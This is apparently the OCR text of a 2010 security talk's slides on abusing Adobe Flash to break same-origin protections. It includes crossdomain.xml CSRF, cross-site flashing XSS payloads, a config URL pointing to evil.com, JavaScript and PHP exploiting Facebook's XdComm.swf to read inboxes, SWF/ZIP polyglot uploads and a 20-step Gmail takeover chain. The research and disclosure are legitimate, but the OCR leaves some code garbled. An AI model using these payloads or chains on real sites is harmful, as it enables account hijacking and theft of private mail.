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Goal 



To discuss ways Flash can be leveraged in an attack 
Not programming or implementation bugs in Flash player 
Not necessarily even Adobe's fault 



Let's find ways to abuse Flash to compromise users, websites, 
and browsers 
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Let's talk about Same Origin Policies 



Scripts on Site A cannot access scripts, cookies, or read 
content from Site B without explicit permission from Site B. 

This allows Site B to keep session data, sensitive information, 
and other resources private. 
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Javascript's Same Origin Policy 



Is a core component of webapp security. 

Relies on strongly defined boundaries between websites and 
applications (Which do not exist) 

Relies on airtight input sanitization (Which is difficult) 

Relies on airtight DNS (Which is unlikely) 

Browsers are implementing ways to bypass it on purpose 



Clearly, it isn't working, but it is currently all we have. 
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Flash's Same Origin Policy 



Modeled after Javascript's policy. 

Better implemented than Javascript (in theory), due to a clear 
boundary between the Flash application and the rest of the 
site. 

In practice, may be easier to bypass. 



Much of this talk will focus on violating this policy, with other 
tricks of the trade sprinkled throughout 
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The Easy Way: Crossdomain policies 



When attempting crossdomain communication, Flash will first 
check the crossdomain. xml file on the targeted server. 

Adobe recommends that admins do not place "Allow *" 
directives in crossdomain.xml. 

...But people do anyways. Lots of people. 

Adobe recommends that admins do not place "Allow 
*. yourdomain.com" directives in crossdomain.xml 

...But people do anyways. Lots of people. 
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In 2006, Jeremiah Grossman found that 6% of the top 100 
websites have unrestricted crossdomain policies. 

He predicted that this risk was likely to grow. 



In mid-2008, Jeremiah used a slightly different set of websites, 
but found that 7% are unrestricted, and 11% have 
*. domain. com. 
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Again using a different sample, I took a look 



From the Alexa top 1 000 websites 

13.4% allow* 

37.6% allow *. domain. com 



This problem is not going away 



And it is already being exploited 
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The LiveJournal Worm 

An overly permissive crossdomain file allowed LJ account 
hijacking. 

Hijacked accounts would modify blog posts to place Flash 
payload in those accounts. 

Classic web worm behavior, but using Flash and crossdomain 
policies instead of cross-site scripting or browser exploits. 



3,300 accounts infected in a few hours 
It could have been much worse. 
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http://blogs.adobe.com/crossdomain.xm 



Mozilla Firefox 



File Edit View History Bookmark* Tools Help 
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<?xml version-' 1.0"?> 

<!DOCTYPE cross -domain -policy SYSTEM "http://www.niacrorriedia.com/xml/dtds/cross-dofriaii 

<cross -domain -policy> 

<allow-access-f rom domain="*" /> 
</cross -domain -policy> 
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Crossdomain.xml CSRF 



Remember how we said Flash could not make requests to any 
outside servers? 

There is an exception: The crossdomain.xml file itself 

What if we ask Flash to grab a file from our own server, but place a 
302 redirect on crossdomain.xml? 

We can redirect you to other files on other servers 

We can log you into other servers with a 302 to 
http://foo:bar@baz.com/crossdomain.xml 

No browser alerts will be triggered... as long as the password is 
correct 

Now I can log you into that router on your network with the default 
password and use CSRF to change network settings. 
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XSS in Flash Objects (Cross-Site Flashing) 



Also not new, but incredibly common 

Poorly written flash objects can take inputs as URL 
parameters, which can in turn be poisoned. 



http://foo. com/file. swf?url=javascript:alert(document.cookie); 
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^. Serious Flash vulns menace at leas... 



Serious Flash vulns menace at least 10,000 websites 

No patch anytime soon 

By Dan Goodin in San Francisco * Get more from this author 

Posted in Enterprise Security, 21st December 2007 23:44 GMT 
Free whitepaper - Patch management 

Researchers from Google and a well-known security firm have documented serious 
vulnerabilities in Adobe Flash content which leave tens of thousands of websites susceptible 
to attacks that steal the personal details of visitors. k 

The security bugs reside in Flash applets, the ubiquitous building blocks for movies and 
graphics that animate sites across the web. Also known as SWF files, they are vulnerable to 
attacks in which malicious strings are injected into the legitimate code through a technique 
known as cross-site scripting, or XSS. Currently there are no patches for the vulnerabilities, 

i*/k\ii^K arci fni inH \y\ ei+ae nnarQ+eifl V\\t fir\ai-ii^ial inc+i+i if i rune nnuarnmcint -anai-M^iae onH nftaar 
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[ Date Frev U Date Next l[ Thread Frev l[ Thread Nexf H Date Index lf Thread Index l 

[WEB SECURITY] XSS vulnerabilities in 215000 flash files 



* From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> 

* Subject: [WEB SECURITY] XSS vulnerabilities in 215000 flash files 

* Date: Thu, 27 Nov 2008 20:22:46 +0200 



k 



Hello to Web Security Hailing List! 

It's my first letter to the list and I decided to inform community about my interesting finding. 

Recently, 12th of November 2008, I found XSS vulnerabilities in 215000 flash files. As I wrote about at my site http : //websecu rity . com . ua 
72609/ (on Ukrainian), and this is English version of my article. 

During my researches of vulnerability at cpmstar.com ( http : //websecu rity . com . ua/2607/ ) which I found at 19.01.2008, I found that in Internet 
there are many flash files with the same vulnerability. In total there are up to 215000 flash files in Internet which are vulnerable to 
Cross-Site Scripting [at more than 200000 sites). 

It's seen from data of Google: 

http : //www. google . com . ua/search?q=f iletype%3Aswf+inurl%3AclickTAG (note: for current time Google shows other number, which is common for it) 

And these are only those flashes, which were indexed by Google, and actually there can be much more of them. In results there are site with 
non vulnerable flash files (or sites which not have mentioned flashes already), but this is single instances, and almost all sites in search 
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[WEB SECURITY] XSS vulnerabilities in 8 millions flash files 

• From. "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> 

• Subject [WEB SECURITY] XSS vulnerabilities in 8 millions flash files 

• Date: Tue, 22 Dec 2009 16:16:59 +0200 

Hello participants of Hailing List. 

Recently, 18th of December 2009, I wrote the article XSS vulnerabilities in 
8 millions flash files C http ; //websecurity , com , ua/3781/ 1 , and yesterday I 
wrote English version of it ( http : //websecurity , com , ua/3789/ ) , 

I'll continue a topic, which I started in 2008 in my article XSS 
vulnerabilities in 215000 flash files 

( http : //www.webappsec , org/lists/websecurity/archive/2008-ll/msa00110, html ) . 
That time I found hundreds of thousands flash files vulnerable to Cross-Site 
Scripting attacks. After previous article, published at 12.11.2008, I 
continued researches and found, that much more flash files - millions flash 
files - were vulnerable to XSS attacks. As flash files in different global 
and local banner systems, as flash files at individual sites. 

Table of contents: 

1. Vulnerable ActionScript code. 
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files 



XSS vulnerabilities in 34 millions flash 



* From: "MustLive" <mustli\/e@xxxxxxxxxxxxxxxxxx> 

* Subject [WEB SECURITY] XSS vulnerabilities in 34 millions flash files 

* Date: Sun, 10 Jan 2010 22:37:31 +0200 



Hello participants of Hailing List. 

Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files 
( http : //websecurity , com , ua/3842/ 1 . and here is English version of it. 

In December in my article XSS vulnerabilities in 8 millions flash files 
( http : //vebsecurity , com , ua/3789/ 1 I wrote, that there are up to 34GGGGGG 
of flashes tagcloud.swf in Internet which are potentially vulnerable to XSS 
attacks. Taking into account that people mostly didn't draw attention in 
previous article to my mentioning about another 34 millions of vulnerable 
flashes, then I decided to write another article about it. 

File tagcloud.swf was developed by author of plugin WP-Cumulus for WordPress 
( http : //websecurity . com . ua/3665/ 1 and it's delivered with this plugin for 
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My preferred approach: XSS through RFI bugs in Flash 
Objects 

Many objects load a secondary XML configuration file. 



http://foo. com/file. swf?config=config.xml 

http://foo. com/file. swf?config=http://evil.com/config.xml 
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bLjsH0G0PYmTEJaTSnUGdc3UVWJ_oP3m4liohl8GGNrjTmPaBN-gpoh05kaGVE3PErOSjO5MgWlUnGnaQE-FRBHqi5_537gwpGDMW; upct=49; cookie_contact_prione=; LANG=en_US%3bUS; 

INSIDE_SEARCH_PARAMS=0%3bUS%3ben_US%3bAmerica%2fLo5_Angeles; 5_sess=%205_cc%3Dtrue%3B%205_refre5h%3Dp/ge'n/login-proce55ing%253A%253AJogin-proce55ing%3B%205_5q%3D%3B 



OK 



-tr 



Click for XSS 
Click for XSS 



© Click for XSS 



Transferring data from cms.paypal.com. 



rfjii -$? FoxyProxy: Local SOCKS * S |» (unknown) 
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This all demonstrates one thing: Injecting Javascript into a 
Flash object is no more difficult than injecting Javascript into a 
web page. 
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Fun Quirk: Client-Side HPP 

A bad name for a simple attack: Passing multiple copies of the 
same parameter. 

http://foo. com/file. swf?input=foo&input=bar 

Flash will interpret $input as "bar" 

http://foo. com/file. swf?input=foo#&input=bar 

Flash will still interpret $input as "bar," but in server logs, it 
shows up as "foo" 

Server-side forensics may never know that the SWF was 
attacked . 

Even if they do figure that much out, they will not be able to 
find out what inputs were passed to it. 
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More Cross-domain Communication 



In these examples, Javascript called from a Flash object runs 
in the same security domain that the object was served from. 

Performing these exploits requires iframing the object. 

But what if we embed that object in another website? 



Hello, cross-domain communication. 



Goodbye, same-origin policy. 
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How do we exploit it? 



Embed a malicious object in a page on the target server 



Corrupt an innocent, but poorly written flash object 



Place a malicious object on the targeted server 
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Embed a malicious object in a page on the 

target server 



Generally requires HTML injection... In which case you 
probably have an XSS vulnerability anyways. 



Probably not the best attack, but there are believable 
scenarios: 

Place an innocent-but-useful object on my server, invite 
people to embed it on their web page, then swap it out. 
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Corrupt an innocent, but poorly written flash 

object 



This is covered by the previous Cross-Site Flashing 
discussion 



But there is another approach: 



If an "innocent" Flash object executes calls (or exports 
methods) to Javascript on the embedding page, those calls 
can be intercepted and return poisoned data. 
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http://static.facebook.com/swf/XdComm.swf 



private function init (event : Event ) : void{ 

this . removeEventListener( Event . ENTER_FRAME, this . init) ; 

Externallnterface.laddCallbackC'sendXdHttpRequest" , this . sendXdHttpRequest ) ; 

ExternalInterface.addCallback("setCache" , this . setCache) ; 

ExternalInterface.addCallback("getCaehe" , this .getCache) ; 

ExternalInterface.addCallback("setCacheContext" , this . setCacheContext ) ; 

ExternalInterface.addCallback("clearAllCache" , this . clearAHCache) ; 

Externallnterf ace. call ("FBOnFlashXdCommReady" ) ; 

return; 
}// end function 
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http://static.facebook.com/swf/XdComm.swf 



I C LUI II 



}// end function 

XdComm. fbTrace("SendXdHttpRequest" , {method : method, url : url, 
if (url.indexOf("https:// M ) != && url . indexOf ( "http://" ) ! 

{ 

url = "http://" + url; 

} 

if ( ! /^ittps? : \/\/api( . * )\ . f acebook\ . com/ . test (url ) ) { 

return 0; 

} 

var _loc_6:* = XdComm; 

var _loc_7:* = XdComm. requestldCount + 1; 

_loc_6. requestldCount = _loc_7; 

var req : * = new URLRequest (url) ; 

loader = new URLLoader(); 

reqld = XdComm. requestldCount ; 

req. method = method; 



fe 
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http://skeptikal.org/facebook_exploit.html 



FBOnFlashXdCommReady = function(){ 

document . getElementByld { ' sw1 ) . sendXdHttpRequest ( ' 



} 



' http : //api . f afcebook . com . skeptikal . org/exploits/ redirect . php ' , null , null ) 



FBOnXdHttpResult = function (reqid, page_content){ 
pagecontent = FB_reverse_undo_everything( stringy) ; 
if (page_content .match(/l_og In/) ){ 

alert ("Shucks, you're not logged in to Facebook"); 

return 0; 

} 

alert (page content) ; 

} 

payloadUrl = ' http://static.facebook.com/swf/XdComm.swf ' ; 

document. write( ' <embed src=" ' +payloadUrl+' id="swfPwn" quality="high" width="l" height="l 
style="border:0px solid red;" type="application/x-shockwave-flash" 
pluginspage="http://www. macromedia .com/go/getflashplayer allowscriptaccess="always" />' ) ; 
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http://api.facebook.com.skeptikal.org/exploits/redirect.php 



<?php 

header ( 'location: http://rn.facebook.com/inbox/ 1 ) ; 
?> 
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<CH v C™ ^^ ^ http://Bkeptikal.org/idle/ipad_awesomene55.png 




i v J|v Google C^ 




@ Disable v A Cookies v _jCSSv __] Forms v |_§ images v @ information v 


Miscellaneous^ 


_•' Outline v __Resizev ^Tbolsv §Jview Source^ JQpti 


® OMGHAX 


* 




V 



ik 



Facebook | Inbox 

Search 

6 messages. 

You Got Framed - NYE Edition Mike Dahn January 1 at 1:05pm Hope you 
recovered from the night before. Here 
s all the evidence of fun. 




Hum. | December 29, 2009 at 9:29pm I was eating roast beef 

and ricottaor^^e^Tnavno job and it 
s making me I... 



Message Mike Murray September 8, 2009 at 10:28pm So, check it out. If I put 
a URL in here, you can click on it. http://www.e-. 



Hey Hey Hey 

that. Just let me know when. 



November 15, 2008 at 12:32pm I can do 



Hey [November 9, 2008 at 3:45am 

m not really in a hurry to go through the buying and moving anytime soon, b... 
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Place a malicious object on the target server 



Webmail allows attachments 

Internal web applications have customer spec sheets, code 
checkins, etc. 

Document repositories 

Mirror sites and syndication 

Image galleries 

Forums 

Ecommerce sites 

Advertisers with Flash banners 

Mass hosting 
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If I can upload a flash file directly to your server. 

and you serve that file back to me... 

it can be embedded in, and run javascript on... 



my domain. 
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Flash Scratch Script - Mozilla Firefox 

File Edit View History Bookmarks Tools Help 




'C^ v 6 © _& I® http://skeptikal.org/exploits/flash_sploit.html 




■£> Disable v A Cookies v _|CSS v __] Forms v |_f| images v @ Information v Miscellaneous v _/ Outline v __ Resize v J^Tbols v _g_view Source v ->Optior 


'- Flash Scratch Script 


* 



The page at http://skeptikal.org says: |"x~| 
api.photoshop.com 



<^'0K 



File Edit View Help 



¥ 



fZ3 uh hiJ;ji/ji3ii3;j_lI_-Lar _tf^j^J^3i£?jjJiiiij.>^pJ^]_,JiixjjJ - i>J^_QJJii rhuluA 



< ! DO C7YPE html PUBLIC " -f/W3C/ /DTD XHTML 1. 8 Strict/ 7 EN" "http://www.w3.org/ TR/ xhtml 1/ DTD/ xhtml 1- strict. dtd"> 
<html xmlns="http: //www. w3.org/1999/xhtml" xmL:lang="en" lang="en"> 
<head> 

<meta hrttp-equiv="content-type" content-" text/html; charset=IJTF-8" /> 
<title>Flash Scratch Script</title> 
</head> 
<body> 

<enbed src=" http: //api.phQtoshQp.CQm/hQ[ne_a7Q59Q66a84e4f26b512b7bbb99e2706/adQbe-px-thurnbnail5/84b275532ca44328b9468dQ4f244cafl/full5ize. j pg" quality= 
</body> 
</htiiil> 
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How is this different from uploading a Javascript file? 



An uploaded Javascript file will not execute: it needs to be 
embedded in a web page. 

An uploaded HTML page will not execute* 

An uploaded SWF file will be executed. 



This makes it slightly easier to get a SWF on a server- it can 
have any file extension, and be served with any content-type 
header. 



'except with certain extensions on Internet Explorer. This is also dumb. 
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Remember G I FAR? 

The SWF file format requires a specific set of bytes at the 
beginning of the file, but allows arbitrary amount of "junk" data 
at the end of the file. 



The ZIP format, on the other hand, allows junk data at the 
beginning of the file, and the actual data can be placed at the 
end. 



Because of this fact, we can create files that are both a valid 
Flash object and a valid Zip file. 



Try validating that server-side. 
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But wait, there's more! 



Many file formats are essentially just ZIP files 

Office Open XML (docx, pptx, etc) 

JAR (If you want to be silly) 

XPI 

Self-extracting executables 



If you can't upload your SWF directly, try one of these 
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File Edit View History Bookmarks Tools Help 

O V © T^ | T I http://172.16.1QQ.129;8Q8Q/browse/BQRIC3~ 



Disable^ A Cookies v JCSS v O Forms v |S| Images v ® information v Miscellaneous v ^/ outline v 



"jf' [#BORK-3] asdf - TC>ur Company JIRA 



XJIRA 



O 



HOME BROWSE PROJECT FIND ISSUES CREATE NEW ISSUE 



Issue Details 

(XML | Word | Printable ) 



Key: 

Type: 



BORK-3 



B Bug 
Status: ^ Open 
Priority: # Major 
Assignee: admin 
Reporter: admin 
Votes: 

Watchers: 

Available Workflow Actions 
D Start Progress 
D Resolve Issue 
D Close Issue 
Operations 
D Assign this issue 
□ Attach file to this issue 



bork 

:+ asdf 

Created: Today 11:22 PM Updated: Today 11:22 PM 
Component/s: 
Affects Version/s: 
Fix Version/s: 



None 
None 
None 



File Attachments: 


1. H origin whatsit.jpa (0.9 kB) 


Environment: 


asdf 



Description 



asdf 



All 



Comments 



Change History 



There are no comments yet on this issue. 
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O 

File Edit View History Bookmarks Tools Help 



(p v ^ Q ^^ g) http://5keptikal.org/exploits/flasl1_5ploit.html 



Q Disable v A Cookies v |_j|CS5 v H§ Forms v H Images v (@) Information v Misc 



origin_whatsit.jpg (JPEG Image) X 



.,. Flash Scratch Script 



tt 



_n___l 
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How to Hack a Gmail account 



Webmail lives on mail.google.com 



Webmail attachments live on mail.google.com 



Seems simple? Not quite. 
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Plan A 



Send email to victim with attachment 

Email goes to spam box, but is still accessible from the 
account 

I can load the flash object out of the victim's account 



Nope. 



I need to know the messagelD of the attachment to include it 
I don't know your messagelDs 
I do know my messagelDs 



© 2010 - Foreground Security and Skeptikal, LLC. All rights reserved 



SECURITY 



Superior Security. Visible Results 



Plan B 



Send email to myself with attachment 

Log user into my account via CSRF 

Load malicious attachment into browser 

Log user out in the background 

Convince user to log in to his account (without unloading the 
current page) 

Use Flash to execute requests against the Gmail server, 
reading the contents of the victim's inbox 
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Other Problems 

Token-based CSRF protection on login 

Solution: Cross-subdomain cookie manipulation, which can force 
CSRF tokens and bypass protection. 

Finding an XSS hole in *. google. com 

Solution: Google gadgets can be poisoned with arbitrary XML files, 
injecting javascript into sites.google.com 

Content-disposition Header 

Solution: Convince Gmail the attachment is an image, which will be 
served as "inline" instead of "attachment" 

Framebusters 

Solution: This is a race condition. Unload the page by destroying the 
iframe after it sends a response (And sets cookies), but before 
Javascript renders. 
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More Other Problems 

Race condition Timing issues 

Solution: DOM quirks and network speed analysis solve it for 
Firefox, but that's another talk. 

Getting the User to log back in 

Solution: A mild form of social engineering. A registration page which 
asks him to check his email to confirm registration. 

Detecting whether the user has logged in 

Solution: Have the flash object periodically poll a Gmail 
documentation page, which lives on mail.google.com but does not 
redirect the user to www.google.com if he is not logged in (as this 
would cause the Flash object to request 
www.google.com/crossdomain.xml, which would disallow this 
domain and halt payload execution. 
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The Final Exploit: 20 Steps 



I create a SWF payload 

I change the file extension to Jpg 

I send it to my Gmail account as an attachment 

I get the URL of that attachment, add it to my web page 

You hit my web page 

My page logs you out of Gmail via CSRF 

You request Google gadget from sites.google.com 

Google requests XML config file from my server 

You load the gadget, which is poisoned with XSS 

The XSS payload adds an arbitrary cookie to your browser 

I log you into my Gmail account via CSRF (with the forced cookie) in an iframe 

I destroy the login iframe before it can execute its framebuster code 

You request the payload out of my inbox 

Thinking it is an image, Google serves it up without the content-disposition header 

You execute the payload as a SWF 

The payload executes Javascript in my page, informing me that it is running 

My page logs you out of my Gmail account via CSRF 

The payload waits, loading and parsing the Gmail help page periodically to detect whether you are logged in 

You log in to your Gmail account in another tab 

The SWF now has full read/write access to your Gmail account 

I do a victory dance 
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Why not just disable Flash? 



\=£ 



LI 



@jake # t 

Posted Wednesday 23rd December 2009 17:56 GMT 




» More to the point, WHY? Has anything useful ever been done 
with Flash? 



http://www.badgerbadgerbadgerxom/ 



fe 



Report 



& ° 




A^ A | A q n^^u u 



Good luck with that 
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Questions? 



mckt@skeptikal.org 



